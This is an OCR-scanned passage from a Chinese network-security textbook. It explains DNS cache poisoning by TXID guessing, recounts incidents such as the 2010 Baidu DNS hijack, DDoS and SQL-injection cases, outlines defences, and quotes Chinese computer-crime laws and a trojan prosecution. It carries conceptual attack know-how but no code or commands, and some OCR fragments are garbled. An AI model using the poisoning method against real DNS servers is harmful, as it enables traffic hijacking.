首先 介绍 一 下 DNS 查询 是 如 何 进行 的 。 客 户 机 在 通过 域名 访问 网 站 时 ,将 首先 触发 一 
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个 域名 查询 请 求 ,该 请 求 将 被 发 送 到 自己 主机 设置 的 首选 DNS 服务 器 (通常 由 ISP 提供 ) 。 
首选 DNS 服务 器 在 缓存 中 若 查找 不 到 该 域名 , 则 将 请 求 转发 到 根 域名 服务 器 , 根 域名 服务 
器 将 告诉 查询 者 能 对 该 域名 进行 解析 的 权威 域名 服务 器 的 地 址 。 接 下 来 首选 DNS 服务 器 
将 向 权威 域名 服务 器 重新 发 起 域名 查询 请 求 , 查 询 结果 将 保存 在 缓存 中 ,从 而 提高 查询 效率 
并 降低 由 DNS 带 来 的 流量 开销 。 客 户主 机 再 使 用 IP 地 址 在 因特网 中 定位 要 访问 的 网 站 。 

域名 查询 使 用 UDP 协议 , 它 是 一 种 无 连接 的 协议 。 为 了 识别 来 自 不 同 服务 器 的 响应 
报 文 ,DNS 协议 使 用 端口 和 一 个 称 为 TXID( 相 当 于 TCP 协议 的 报 文 序列 号 ) 的 标识 字段 来 
区 分 。 早 期 的 DNS 协议 使 用 固定 端口 来 发 起 DNS 查询 请 求 , 这 时 ,TXID 就 成 了 识别 响应 
报 文 的 唯一 标识 。DNS 协议 在 设计 时 ,TXID 序列 号 只 设计 了 16 个 二 进 制 位 宽 , 其 可 能 的 
序列 号 就 只 有 2 个 。 

伪造 UDP 报 文 的 来 源 地 址 是 很 容易 的 事 ,在 ISP 的 缓存 DNS 服务 器 发 起 查询 请 求 后 ， 
在 真实 的 权威 DNS 服务 器 发 出 正确 的 响应 报 文 之 前 ,攻击 者 可 用 穷 举 法 遍历 所 有 可 能 的 
TXID 序列 号 ,伪造 出 所 有 可 能 的 DNS 响应 报 文 , 然 后 发 送 给 ISP 的 缓存 服务 器 ,并 设法 让 
ISP 的 缓存 DNS 服务 器 相信 自己 伪造 出 的 响应 报 文 是 来 自 权威 DNS 的 应 答 , 就 可 达到 攻 
击 目的 了 。 在 发 出 的 众多 报 文中 ,肯定 会 有 一 个 报 文 是 与 ISP 的 缓存 DNS 服务 器 所 期 望 的 
响应 报 文 相 匹配 的 ,攻击 就 会 成 功 。 从 中 可 见 ,攻击 的 原理 就 是 通过 猜测 DNS 解析 过 程 中 
响应 报 文 的 TXID 报 文 序列 号 来 伪造 DNS 权威 服务 器 的 应 答 , 从 而 达到 劫持 ISP 的 DNS 
高 速 缓存 (Cache) 中 的 域名 解析 记录 ,使 受到 攻击 的 DNS 服务 器 对 外 提供 错误 的 域名 解析 。 

在 网 络 带宽 良好 的 情况 下 ,攻击 程序 对 存在 漏洞 的 DNS 服务 器 只 需 数 分 钟 就 可 完成 攻 
击 , 受 攻击 的 DNS 服务 器 会 瞬时 接收 到 大 量 的 攻击 报 文 ,呈现 拒绝 服务 攻击 的 特点 ,容易 被 
误 判 为 “query flood” 方 式 的 拒绝 服务 攻击 。 

DNS 服务 商 可 根据 DNS 软件 厂商 提供 的 补丁 升级 DNS 服务 系统 ,以 暂时 阻止 缓存 投 
毒 攻击 。 同 时 可 修改 DNS 服务 器 的 设置 ,将 DNS 服务 器 发 起 查询 请 求 的 端口 改 成 随机 端 
口 ,如 图 1. 2 所 示 ,以 增加 伪造 的 响应 报 文 的 匹配 难度 。 
TREE 
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图 1.2 设置 DNS 服务 器 使 用 随机 端口 发 起 查询 请 求 
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由 于 该 漏洞 是 DNS 协议 结构 性 的 缺陷 ,要 彻底 解决 该 安全 隐患 ,应 尽快 部 署 和 推广 使 
DNS 安全 扩展 协议 (DNS Security Extensions, DNSSEC) ,以 允许 网 站 使 用 数字 签名 和 
公共 密 钥 加 密 来 验证 域名 和 对 应 的 IP 地 址 。 

由 于 Dan Kaminsky 的 漏洞 发 现 , 在 一 年 的 时 间 里 ,为 加 强 DNS 安全 所 做 的 工作 已 经 
锯 过 了 前 十 年 的 总 和 ,同时 也 大 大 促进 了 DNSSEC 协议 的 发 展 和 应 用 。2010 年 以 后 ,DNS 
在 面 对 缓 存 投 毒 攻击 时 , 仍 显得 比较 脆弱 。 

2010 年 1 月 12 日 早上 7 时 左右 ,全 球 最 大 的 中 文 搜索 引擎 网 站 百度 被 伊朗 网 络 部 队 
所 攻击 。 本 次 攻击 使 得 占据 中 国 75% 市 场 份 额 的 搜索 引擎 瞬间 大 范围 瘫痪 ,百度 旗下 的 所 
有 服务 和 所 有 子 域名 全 部 无 法 访问 。 

这 是 一 次 利用 Dan Kaminsky 发 现 的 漏洞 进行 的 域名 支持 攻击 ,是 对 百度 的 国外 域名 
服务 商 的 DNS 服务 器 发 起 的 "DNS 缓存 投 毒 "攻击 ,造成 百度 的 域名 (www. baidu. com) 被 
解析 到 了 黑客 事先 做 好 的 网 站 。 百 度 遭 到 黑客 域名 劫持 攻击 后 的 访问 界面 如 图 1. 3 所 示 。 
由 于 百度 网 站 的 访问 流量 很 大 ,黑客 网 站 无 法 承受 这 样 的 大 流量 ,所 以 很 多 用 户 访问 百度 
时 ,出 现 的 是 无 法 访问 的 提示 
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图 1.3 百度 遭 到 域名 劫持 攻击 时 显示 的 界面 


洞 所 带 来 的 安全 威胁 

的 各 种 网 络 服务 软件 以 及 客户 端的 应 用 
少 地 存在 着 因 设计 中 的 缺陷 而 产生 的 安 
响 网 络 安全 的 主要 原因 之 一 

HJ. 很 多 严 重 的 


(2) 操作 系统 、 服 务 软件 和 应 用 软件 自身 的 安 

Windows, Linux 或 UNIX 操作 系统 、 服 务 器 
软件 (如 Adobe Reader、Flash Player 等 ) 都 或 多 或 
全 漏洞 (比如 普遍 存在 的 缓冲 区 溢出 漏洞 ) ,这 也 是 影 

操作 系统 由 于 代码 量 庞大 .系统 复杂 ,存在 着 大 量 已 知 或 未 知 的 安全 漏 
漏洞 允许 远程 执行 代码 ,给 操作 系统 带 来 了 严重 的 安全 威胁 

各 种 网 络 应 用 服务 也 都 存在 着 或 多 或 少 的 漏洞 ,给 网 络 服务 和 服务 器 操作 系统 带 来 严 
重 的 安全 威胁 。 比 如 早期 的 HS 5. 0 存在 的 Unicode 漏洞 ,使 黑客 通过 该 漏洞 可 轻松 控制 任 
意 一 个 网 站 和 服务 器 。 


除了 操作 系统 和 服务 器 软件 以 外 :各 种 应 用 软件 也 存在 着 各 种 各 样 的 安全 漏洞 。 比 如 ， 
2008 年 4 月 8 日 ,Adobe Flash Player 9. 0. 115 及 更 早 版 本 中 被 发 现存 在 着 高 危 漏洞 ,用 户 
只 要 播放 黑客 精心 设计 的 SWF 视频 文件 ,就 会 被 自动 下 载 可 执行 的 恶意 程序 ,然后 恶意 程 

会 主动 连接 指定 的 服务 器 ,从 服务 器 中 下 载 大 量 的 病毒 和 木马 等 恶意 程序 ,使 用 户 计 算 机 
被 完全 控制 。 该 漏洞 平息 不 久 .Adobe Flash Player 10. 0. 12.36 及 以 前 的 版 本 又 发 现 一 个 
高 危 漏洞 。 用 户 只 要 下 载 黑客 精心 设计 的 恶意 SWF 视频 文件 ,黑客 就 可 获得 与 用 户 完全 
相同 的 权限 ,并 可 远程 在 用 户主 机 上 执行 任意 代码 。2010 年 1 月 ,IE 浏览 器 曝 出 的 “极光 ” 
漏洞 引发 了 空前 迅猛 的 挂 马 攻 击 。Microsoft Office 办 公 套 装 软件 也 存在 着 较 多 的 安全 漏 
洞 ,需要 不 断 地 打 补 丁 , 以 确保 系统 的 安全 。 

网 络 数 据 库 服务 器 自身 的 缺陷 和 漏洞 ,也 会 造成 严重 的 网 络 安 全 事故 和 数据 泄密 事件 。 
比如 2003 蠕虫 王 病毒 ,就 是 利用 了 SQL Server 2000 的 远程 堆栈 缓冲 区 溢出 漏洞 来 实施 攻 
击 的 ,造成 SQL Server 2000 数据 库 服 务 器 拒绝 服务 和 网 络 的 大 面积 阻塞 瘫痪 。 

3. 网 络 攻 击 与 入 侵 所 带 来 的 安全 威胁 

(1) 计算 机 病毒 和 木马 的 攻击 与 人 侵 带 来 的 安全 威胁 

计算 机 病毒 的 大 范围 感染 和 传播 ,以 及 木马 病毒 的 攻击 与 人 侵 , 也 是 计算 机 和 计算 机 网 
络 安 全 的 主要 威胁 之 一 。 

据 国 家 计算 机 病毒 应 急 处 理 中 心 的 统计 ,2009 年 ,我 国 计 算 机 病毒 感染 率 为 70. 51%， 
多 次 感染 病毒 的 比率 为 42.71%。 目 前 ,在 我 国 传播 的 计算 机 病毒 逐渐 呈现 趋 利 的 特点 ,以 
木马 性 质 的 病毒 为 主 , 传 播 方式 以 网 页 挂 马 为 主 。 计 算 机 病毒 或 木马 造成 的 主要 后 果 是 用 
户 网 络 游戏 或 网 上 银行 账户 密码 被 盗 . 计 算 机 受到 远程 控制 .计算 机 系统 或 网 络 无 法 正常 使 
用 浏览 器 配置 被 恶意 修改 等 。 在 巨大 利益 的 驱使 下 ,制造 病毒 ,定制 木马 ,传播 或 贩卖 病 
毒 ,木马 或 僵尸 网 络 ,已 形成 了 完整 的 黑色 地 下 经 济 产业 链 , 传 授 病毒 编制 技术 和 网 络 攻击 
技术 的 网 络 犯罪 活动 也 明显 增多 ,严重 威胁 了 我 国 互联 网 的 应 用 和 健康 发 展 。 

(2) 黑客 的 攻击 与 人 侵 带 来 的 安全 威胁 

黑客 的 攻击 与 人 侵 ,特别 是 利用 僵尸 网 络 发 起 DDoS 攻击 ,对 计算 机 网 络 造成 了 严重 的 
安全 威胁 。 

目前 ,进行 DDoS 攻击 的 活动 数量 仍 维持 在 较 高 水 平 , 且 日 益 公开 化 。 下 面 介 绍 一 个 因 
同业 竞争 ,雇佣 黑客 利用 僵尸 网 络 发 起 DDoS 攻击 ,导致 被 攻击 网 络 大 面积 瘫痪 的 案例 。 

2008 年 ,山东 潍坊 两 家 物流 公司 因 存 在 商业 竞争 .一 公司 为 抢夺 客户 资源 雇佣 黑客 攻 
击 另 一 家 物流 公司 的 网 站 ,使 其 不 能 正常 访问 。 受 雇 的 黑客 利用 自己 掌控 的 僵尸 网 络 ( 大 约 
有 5000 多 台 倪 儒 机 ) ,于 2008 年 7 月 17 日 开始 ,采用 DDoS 攻击 手段 ,攻击 另 一 家 物流 公 
司 的 网 站 ,由 于 该 物流 公司 的 服务 器 托管 在 网 通 公 司 的 中 心机 房 ,黑客 的 DDoS 攻击 产生 的 
大 量 网 络 流量 ,严重 堵塞 了 潍坊 市 网 通 的 网 络 , 导 致 浴 坊 市 40 万 网 通用 户 7 月 份 无 法 正常 
上 网 。 

目前 ,基于 Web 的 安全 威胁 也 不 断 增长 ,特别 是 SQL 注入 攻击 导致 大 量 网 站 被 黑 , 网 
站 首页 被 算 改 。 

2008 年 5 月 18 日 下 午 , 苏 州 市 公安 局 网 警 支队 接 报 : 昆山 市 红 十 字 会 网 站 受到 攻击 。 
警方 立即 组 成 专案 组 开展 侦查 ,发现 当日 下 午 3 时 许 , 有 人 攻击 窃取 了 这 个 网 站 后 台 管 理 账 
号 和 密码 ,将 原 网 站 页 面 替 换 成 虚假 页 面 .并 在 虚假 页 面 上 发 布 捐款 账号 。 
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2008 年 5 月 29 R 20 Bf 53 分 前 后 ,黑客 攻击 陕西 地 震 信 息 网 站 ,在 网 站 首页 发 布 了 
“23 时 30 分 陕西 等 地 会 有 强烈 地 震 发 生 "的 虚假 信息 。 

4. 网 络 安全 管理 不 到 位 ,安全 防范 意识 薄弱 和 人 为 操作 失误 带 来 的 安全 威胁 

网 络 安全 管理 不 到 位 ,管理 员 的 安全 防范 意识 薄弱 ,系统 安全 管理 和 安全 设置 不 到 位 ， 
以 及 管理 员 的 操作 失误 ,也 会 给 计算 机 或 计算 机 网 络 带 来 严重 的 安全 威胁 。 

5. 网 络 设施 本 身 和 所 处 的 物理 运行 环境 所 带 来 的 安全 威胁 

计算 机 服务 器 和 网 络 通信 设施 (交换 机 、 路 由 器 等 ) 需 要 一 个 良好 的 物理 运行 环境 ,否则 
将 给 计算 机 网 络 带 来 物理 上 的 安全 威胁 。 


1.3 保障 计算 机 网 络 安全 常用 的 措施 


要 保障 计算 机 网 络 系统 的 安全 ,不 仅 要 从 技术 角度 采取 一 些 安全 措施 ,还 要 在 管理 上 制 
定 一 些 安全 管理 制度 ,提高 安全 管理 和 安全 防范 意识 。 

(1) 使 用 防火 墙 技术 ,实现 对 网 络 的 访问 控制 ,保护 内 部 网 络 不 遭受 到 外 部 网 络 (互联 
网 ) 的 攻击 和 非法 访问 。 

防火 墙 技术 是 目前 保障 网 络 安全 所 普遍 采用 的 安全 技术 。 最 常用 的 主要 是 基于 IP 的 
包 过 滤 式 防火 墙 。 基 于 硬件 的 防火 墙 产品 通常 部 署 在 网 络 的 边界 ,以 保护 内 部 网 络 不 遭受 
到 来 自 外 部 网 络 的 攻击 或 入 侵 。 另 外 ,在 内 部 网 络 的 三 层 交 换 机 上 ,通常 也 可 开启 IP 包 过 
滤 功 能 ,丢弃 部 分 特殊 的 IP 报 文 , 以 防止 病毒 在 内 网 中 的 传播 或 实现 对 网 络 的 访问 控制 。 

(2) 使 用 入 侵 防 御 系 统 , 进 行 主动 安全 防御 。 

随 着 网 络 攻击 技术 的 不 断 提高 和 网 络 安全 漏洞 的 不 断 发 现 ,传统 的 防火 墙 技术 加 传统 
的 入 侵 检 测 系统 (Intrusion Detection System, IDS) ,已 经 无 法 应 对 目前 的 网 络 安全 威胁 ,在 
这 种 情况 下 ,入 侵 防 御 系 统 (Intrusion Prevention System, IPS) MZ mÆ o 

防火 墙 技术 属于 被 动 安全 措施 ,入 侵 防 御 系 统 属于 主动 安全 技术 。 入 侵 防 御 系 统 能 实 
时 监控 ,检测 和 分 析 数 据 流量 ,并 能 深度 感知 和 判断 哪些 报 文 是 恶意 的 报 文 ,并 能 通过 对 恶 
意 报 文 进行 丢弃 以 阻 断 攻击 。IDS 只 能 检测 网 络 攻击 行为 并 告警 ,但 产品 自身 无 法 阻止 网 
络 攻击 行为 。 

(3) 加 强 服 务 器 与 主机 系统 的 安全 。 

网 络 中 的 服务 器 和 用 户主 机 系统 也 必须 提高 自身 的 安全 性 。 为 此 ,可 从 以 下 几 方 面 
AF. 

O 服务 最 小 化 原则 ,删除 不 需要 的 服务 或 应 用 软件 。 

© 及 时 给 系统 和 应 用 程序 打 补丁 , 提 高 操作 系统 和 各 应 用 软件 的 安全 性 。 

@ 用 户 权 限 最 小 化 原则 。 对 用 户 账 户 要 合理 设置 和 管理 ,并 要 设置 好 用 户 的 访问 
权限 。 

© 加 强 口 令 管理 ,杜绝 弱 口 令 的 存在 。 

(4) 安装 防 病毒 和 防 木马 软件 。 

(5) 采用 加 密 技 术 和 数字 证 书 技术 ,提高 网 络 数据 的 安全 性 ,并 实现 用 户 的 身份 认证 。 

(6) 制定 并 落实 网 络 安全 管理 制度 和 数据 备份 制度 ,提高 网 络 安全 防范 和 管理 意识 。 


1.4 信息 安全 法 律 法 规 与 违法 案例 


本 节 简 要 介绍 与 计算 机 信息 安全 相关 的 法 律 法 规 和 违法 案例 ,以 让 读者 明白 哪些 行为 
是 触犯 法 律 的 ,以 及 犯法 的 后 果 ,从 而 树立 起 法 律 安全 意识 。 


1.4.1 信息 安全 法 律 法 规 


与 计算 机 安全 相关 的 法 律 法 规 比 较 多 ,有 国家 层面 的 立法 ,也 有 各 部 委 颁 布 的 法 律 
法 规 。 

1. 中 华人 民 共 和 国 刑法 

中 华人 民 共 和 国 刑法 于 1979 年 7 月 1 日 第 五 届 全 国人 民 代表 大 会 第 二 次 会 议 通过 。 
《中 华人 民 共 和 国 刑法 修正 案 ( 七 )) 已 由 中 华人 民 共 和 国 第 十 一 届 全 国人 民 代 表 大 会 常务 委 
员 会 第 七 次 会 议 于 2009 年 2 月 28 日 通过 , 自 公布 之 日 起 施行 。 

下 面 针 对 2009 年 2 月 28 通过 并 颁布 施行 的 最 新 修正 版 刑法 ,介绍 与 计算 机 信息 安全 
相关 的 法 律 条 款 。 

第 二 百 八 十 五 条 ”违反 国家 规定 ,侵入 国家 事务 .国防 建设 .尖端 科学 技术 领域 的 计算 
机 信息 系统 的 ,处 三 年 以 下 有 期 徒刑 或 者 拘役 。 

违反 国家 规定 ,侵入 前 款 规 定 以 外 的 计算 机 信息 系统 或 者 采用 其 他 技术 手段 ,获取 该 计 
算 机 信息 系统 中 存储 、 处 理 或 者 传输 的 数据 ,或 者 对 该 计算 机 信息 系统 实施 非法 控制 ,情节 
严重 的 ,处 三 年 以 下 有 期 徒刑 或 者 拘役 ,并 处 或 者 单 处 罚金 ; 情节 特别 严重 的 ,处 三 年 以 上 
七 年 以 下 有 期 徒刑 ,并 处 罚金 。 

提供 专门 用 于 侵入 ,非法 控制 计算 机 信息 系统 的 程序 .工具 ,或 者 明知 他 人 实施 侵入 AE 


定 处 罚 。 

在 刑法 第 二 百 八 十 五 条 中 的 第 二 款 和 第 三 款 , 均 是 刑法 修正 案 (七 ) 新 增 的 两 个 条 款 。 
违反 刑法 第 二 百 八 十 五 条 中 的 相关 规定 ,其 可 能 的 罪名 有 非法 侵入 计算 机 信息 系统 罪 ; 非 
法 获取 计算 机 信息 系统 数据 ,非法 控制 计算 机 信息 系统 罪 ; 提供 侵入 ,非法 控制 计算 机 信息 
系统 程序 .工具 罪 。 

第 二 百 八 十 六 条 ”违反 国家 规定 ,对 计算 机 信息 系统 功能 进行 删除 、 修 改 . 增 加、 干扰 ， 
造成 计算 机 信息 系统 不 能 正常 运行 ,后 果 严 重 的 ,处 五 年 以 下 有 期 徒刑 或 者 拘役 ; 后 果 特 别 
严重 的 ,处 五 年 以 上 有 期 徒刑 。 

违反 国家 规定 ,对 计算 机 信息 系统 中 存储 、 处 理 或 者 传输 的 数据 和 应 用 程序 进行 删除 、 
修改 、 增 加 的 操作 ,后 果 严 重 的 ,依照 前 款 的 规定 处 罚 。 

故意 制作 ,传播 计算 机 病毒 等 破坏 性 程序 .影响 计算 机 系统 正常 运行 ,后 果 严 重 的 ,依照 
第 一 款 的 规定 处 罚 。 

违反 刑法 第 二 百 八 十 六 条 的 相关 规定 ,其 罪名 为 破坏 计算 机 信息 系统 罪 。 

第 二 百 八 十 七 条 “利用 计算 机 实施 金融 诈骗 盗窃、 贪污 、 挪 用 公款 、 窃 取 国 家 秘密 或 者 
其 他 犯罪 的 ,依照 本 法 有 关 规 定 定罪 处 罚 。 
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本 条 款 是 对 利用 计算 机 实施 犯罪 的 提示 性 规定 。 

2. 中 华人 民 共 和 国治 安 管 理 处 罚 法 

2005 年 8 月 28 日 第 十 届 全 国人 民 代表 大 会 常务 委员 会 第 十 七 次 会 议 通过 。 

第 二 十 九条 ”有 下 列 行为 之 一 的 ,处 五 日 以 下 拘留 ; 情节 较 重 的 ,处 五 日 以 上 十 日 以 下 
拘留 : 

(一 ) 违反 国家 规定 ,侵入 计算 机 信息 系统 ,造成 危害 的 ; 

(二 ) 违反 国家 规定 ,对 计算 机 信息 系统 功能 进行 删除 ,修改 、 增 加 \ 干 扰 , 造 成 计算 机 信 
息 系 统 不 能 正常 运行 的 ; 

(三 ) 违反 国家 规定 ,对 计算 机 信息 系统 中 存储 、 处 理 、 传 输 的 数据 和 应 用 程序 进行 删 
除 、 修 改 、 增 加 的 ; 

(四 ) 故意 制作 ,传播 计算 机 病毒 等 破坏 性 程序 ,影响 计算 机 信息 系统 正常 运行 的 。 

3. 中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 

该 条 例 以 国务 院 第 147 号 令 , 于 1994 年 2 月 18 日 发 布 并 施行 。 

第 二 十 三 条 ”故意 输入 计算 机 病毒 以 及 其 他 有 害 数据 危害 计算 机 信息 系统 安全 的 ,或 
者 未 经 许可 出 售 计算 机 信息 系统 安全 专用 产品 的 ,由 公安 机 关 处 以 警告 或 者 对 个 人 处 以 
5000 元 以 下 的 罚款 、 对 单位 处 以 15000 元 以 下 的 罚款 ; 有 违法 所 得 的 , 除 予 以 没收 外 ,可 以 
处 以 违法 所 得 1 至 3 倍 的 罚款 。 

第 二 十 八条 ”本 条 例 下 列 用 语 的 含义 : 

计算 机 病毒 ,是 指 编 制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 毁坏 数据 ,影响 
计算 机 使 用 ,并 能 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 。 

第 三 十 条 ”公安 部 可 以 根据 本 条 例 制定 实施 办 法 。 

第 三 十 一 条 ”本 条 例 自发 布 之 日 起 施行 。 

4. 计算 机 信息 网 络 国际 联网 安全 保护 管理 办 法 

该 管理 办 法 于 1997 年 12 月 11 日 由 国务 院 批准 ,1997 年 12 月 30 日 由 公安 部 以 公安 部 
第 33 号 令 发 布施 行 。 

第 四 条 任何 单位 和 个 人 不 得 利用 国际 联网 危害 国家 安全 泄露 国家 秘密 ,不 得 侵犯 国 
家 的 ,社会 的 ,集体 的 利益 和 公民 的 合法 权益 ,不 得 从 事 违法 犯罪 活动 。 

第 六 条 ”任何 单位 和 个 人 不 得 从 事 下 列 危 害 计算 机 信息 网 络 安全 的 活动 : 

(一 ) 未 经 允许 ,进入 计算 机 信息 网 络 或 者 使 用 计算 机 信息 网 络 资源 的 ; 

C.) 未 经 允许 ,对 计算 机 信息 网 络 功能 进行 删除 ,修改 或 者 增加 的 ; 

(=) 未 经 允许 ,对 计算 机 信息 网 络 中 存储 、 处 理 或 者 传输 的 数据 和 应 用 程序 进行 删除 、 
修改 或 者 增加 的 ; 

(四 ) 故意 制作 、 传 播 计算 机 病毒 等 破坏 性 程序 的 ; 

(五 ) 其 他 危害 计算 机 信息 网 络 安全 的 。 

第 七 条 ”用 户 的 通信 自由 和 通信 秘密 受 法 律 保护 。 任 何 单位 和 个 人 不 得 违反 法 律 规 
定 ,利用 国际 联网 侵犯 用 户 的 通信 自由 和 通信 秘密 。 

第 十 九条 公安 机 关 计算 机 管理 监察 机 构 应 当 负责 追踪 和 查处 通过 计算 机 信息 网 络 的 
违法 行为 和 针对 计算 机 信息 网 络 的 犯罪 案件 ,对 违反 本 办 法 第 四 条 、 第 七 条 规定 的 违法 犯罪 
行为 ,应 当 按照 国家 有 关 规 定 移送 有 关 部 门 或 者 司法 机 关 处 理 。 
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第 二 十 二 条 ”违反 本 办 法 第 四 条 、 第 七 条 规定 的 ,依照 有 关 法 律 .法 规 予 以 处 罚 。 

5. 中 华人 民 共 和 国 计 算 机 信息 网 络 国际 联网 管理 暂行 规定 实施 办 法 

1998 年 2 月 13 日 ,由 国务 院 信息 化 工作 领导 小 组 发 布 并 施行 。 

第 十 八条 ”用 户 应 当 服从 接 入 单位 的 管理 ,遵守 用 户 守则 ; 不 得 擅自 进入 未 经 许可 的 
计算 机 系统 , 算 改 他 人 信息 ; 不 得 在 网 络 上 散发 恶意 信息 , 冒 用 他 人 名 义 发 出 信息 ,侵犯 他 
人 隐私 ; 不 得 制造 ,传播 计算 机 病毒 及 从 事 其 他 侵犯 网 络 和 他 人 合法 权益 的 活动 。 

第 二 十 条 ”互联 单位 、 接 入 单位 和 用 户 应 当 遵 守 国家 有 关 法 律 , 行 政法 规 ,严格 执行 国 
家 安全 保密 制度 ; 不 得 利用 国际 联网 从 事 危 害 国家 安全 泄露 国家 秘密 等 违法 犯罪 活动 ,不 
得 制作 、 查 阅 、 复 制 和 传播 妨碍 社会 治安 和 淫秽 色情 等 有 害 信 息 ; 发 现 有 害 信 息 应 当 及 时 向 
有 关 主 管 部 门 报告 ,并 采取 有 效 措施 ,不 得 使 其 扩散 。 

第 二 十 三 条 ”违反 《暂行 规定 ) 及 本 办 法 ,同时 触犯 其 他 有 关 法 律 \ 行 政法 规 的 ,依照 有 
关 法 律 .政法 规 的 规定 予以 处 罚 ; 构成 犯罪 的 ,依法 追究 刑事 责任 。 

第 二 十 四 条 ”与 香港 特别 行政 区 和 台湾 、 澳 门 地 区 的 计算 机 信息 网 络 的 联网 ,参照 本 办 
法 执行 。 

第 二 十 五 条 ”本 办 法 自 颁布 之 日 起 施行 。 

6. 计算 机 病毒 防治 管理 办 法 

计算 机 病毒 防治 管理 办 法 是 由 公安 部 根据 (中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 
条 例 ) 的 规定 制定 的 实施 办 法 。 该 管理 办 法 于 2000 年 3 月 30 日 公安 部 部 长 办 公会 议 通过 ， 
以 公安 部 第 51 号 令 于 2000 年 4 月 26 日 发 布施 行 。 

7. 全 国人 民 代 表 大 会 常务 委员 会 关于 维护 互联 网 安全 的 决定 

2000 年 12 月 28 日 ,第 九 届 全 国人 民 代 表 大 会 常务 委员 会 第 十 九 次 会 议 通 过 。 

第 一 条 ”为 了 保障 互联 网 的 运行 安全 ,对 有 下 列 行为 之 一 ,构成 犯罪 的 ,依照 刑法 有 关 
规定 追究 刑事 责任 : 

(一 ) 侵入 国家 事务 .国防 建设 .尖端 科学 技术 领域 的 计算 机 信息 系统 

(二 ) 故意 制作 ,传播 计算 机 病毒 等 破坏 性 程序 ,攻击 计算 机 系统 及 通信 网络 ,致使 计算 
机 系统 及 通信 网 络 遭 受 损 害 ; 

(三 ) 违反 国家 规定 ,擅自 中 断 计 算 机 网 络 或 者 通信 服务 ,造成 计算 机 网 络 或 者 通信 系 
统 不 能 正常 运行 。 

第 二 条 ”为 了 保护 个 人 、 法 人 和 其 他 组 织 的 人 身 、 财 产 等 合法 权利 ,对 有 下 列 行为 之 一 ， 
构成 犯罪 的 ,依照 刑法 有 关 规 定 追 究 刑事 责任 : 

(一 ) 利用 互联 网 侮辱 他 人 或 者 捏造 事实 诽谤 他 人 ; 

(二 ) 非法 截获 . 自 改 .删除 他 人 电子 邮件 或 者 其 他 数据 资料 ,侵犯 公民 通信 自由 和 通信 
秘密 ; 

(三 ) 利用 互联 网 进行 盗窃 诈骗 .敲诈 勒索 。 

8. 互联 网 上 网 服务 营业 场所 管理 条 例 

该 管理 条 例 于 2002 年 8 月 14 日 国务 院 第 62 次 常务 会 议 通过 ,以 国务 院 第 363 号 令 于 
2002 年 11 月 15 日 发 布施 行 。 

第 十 五 条 互联 网 上 网 服务 营业 场所 经 营 单位 和 上 网 消费 者 不 得 进行 下 列 危害 信息 网 
络 安全 的 活动 : 
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(一 ) 故意 制作 或 者 传播 计算 机 病毒 以 及 其 他 破坏 性 程序 的 ; 

(二 ) 非法 侵入 计算 机 信息 系统 或 者 破坏 计算 机 信息 系统 功能 ,数据 和 应 用 程序 的 ; 

(三 ) 进行 法 律 , 行 政法 规 禁止 的 其 他 活动 的 。 

第 三 十 七 条 ”本 条 例 自 2002 年 11 月 15 日 起 施行 。2001 年 4 月 3 日 信息 产业 部 ,公安 
部 文化 部 .国家 工商 行政 管理 局 发 布 的 (互联 网 上 网 服务 营业 场所 管理 办 法 ) 同 时 废止 。 


1.4.2 信息 安全 违法 案例 


1. 提供 侵入 计算 机 信息 系统 程序 罪 ,非法 获取 计算 机 信息 系统 数据 罪案 例 

(1) 案件 简介 

2009 年 12 月 16 日 上 午 , 江 苏 省 徐州 市 鼓楼 区 人 民法 院 对 由 公安 部 挂牌 督办 的 、 全 国 
最 大 的 制作 ,传播 “ 温 柔 ”系列 木马 团伙 案 作 出 公开 宣判 , 吕 某 、 曾 某 、 严 某 等 11 名 被 告 人 分 
别 因 犯 提供 侵入 计算 机 信息 系统 程序 罪 和 非法 获取 计算 机 信息 系统 数据 罪 , 被 法 院 一 审判 
处 有 期 徒刑 三 年 至 有 期 徒刑 六 个 月 、 缓 刑 一 年 ,拘役 六 个 月 、 缓 刑 一 年 不 等 的 刑罚 ,法 院 还 分 
别 对 被 告 人 并 处 罚金 ,总 计 人 民 币 83. 3 万 元 。 

“温柔 ”系列 木马 团伙 案 涉及 全 国 16 个 省 市 ,涉案 人 员 百 余人 ,涉案 金额 3000 多 万 元 。 

(2) 案件 回放 

2007 年 6 月 至 2008 年 8 月 间 , 吕 某 、 曾 某 在 广东 省 深圳 市 ,先后 编写 出 国内 流行 的 风 
B ,完美 国际 、 武 林 外 传 .QQ 自由 幻想 等 40 余 款 网 络 游戏 的 木马 程序 ,用 于 窃取 网 络 游戏 
玩家 的 账号 和 密码 ,并 由 曾 某 出 面 寻 找 合 作 伙伴 帮助 销售 。 

2008 年 2 月 起 , 严 某 接受 曾 某 的 委托 ,将 该 系列 木马 程序 ,以 其 女友 陈 某 的 网 名 “温柔 ” 
命名 并 总 代理 销售 ,同时 按照 不 同 种 类 的 网 络 游戏 ,由 吕 某 将 木马 程序 修改 后 分 包 给 不 同 的 
一 级 代理 商 张 某 、 张 某 某 等 人 ,并 按照 包 用 时 间 向 后 者 收费 。2008 年 6 月 , 陈 某 参 与 经 营 ， 
与 严 某 共同 代理 销售 “温柔 "系列 木马 程序 。 至 案 发 前 , 吕 某 等 人 针对 不 同 网 络 游戏 开发 并 
销售 了 28 款 “ 温 柔 ” 系 列 木 马 程序 ,盗窃 游戏 账号 密码 超过 530 万 组 。 吕 某 、 曾 某 二 人 共同 
获 利 64. 5 万 余 元 , 严 某 、 陈 某 共 获 利 31 万 元 。 

另外 ,2008 年 6 月 中 旬 至 7 月 底 , 严 某 还 利用 垄断 “温柔 "系列 木马 程序 代理 权 之 便 , 取 
得 了 “QQ 自由 幻想 ?游戏 的 “温柔 ?木马 程序 使 用 权 , 然 后 通过 他 人 将 该 木马 程序 插入 到 正 
常 网 页 , 随 游戏 玩家 点 击 网 页 而 将 木马 程序 植 和 玩家 计算 机 系统 ,在 玩家 登录 “QQ 自由 纪 
想 ” 网 络 游戏 时 ,木马 程序 自动 运行 并 通过 后 台 资 取 游戏 账号 和 密码 ,共计 82780 组 , 严 某 将 
所 瓷 取 账号 和 密码 转卖 给 他 人 .以 获得 非法 利益 。 

2008 年 4 月 至 8 月 底 , 丁 某 、 许 某 、 林 某 明知 严 某 、 陈 某 从 事 木 马 程序 销售 , 仍 参 与 并 担 
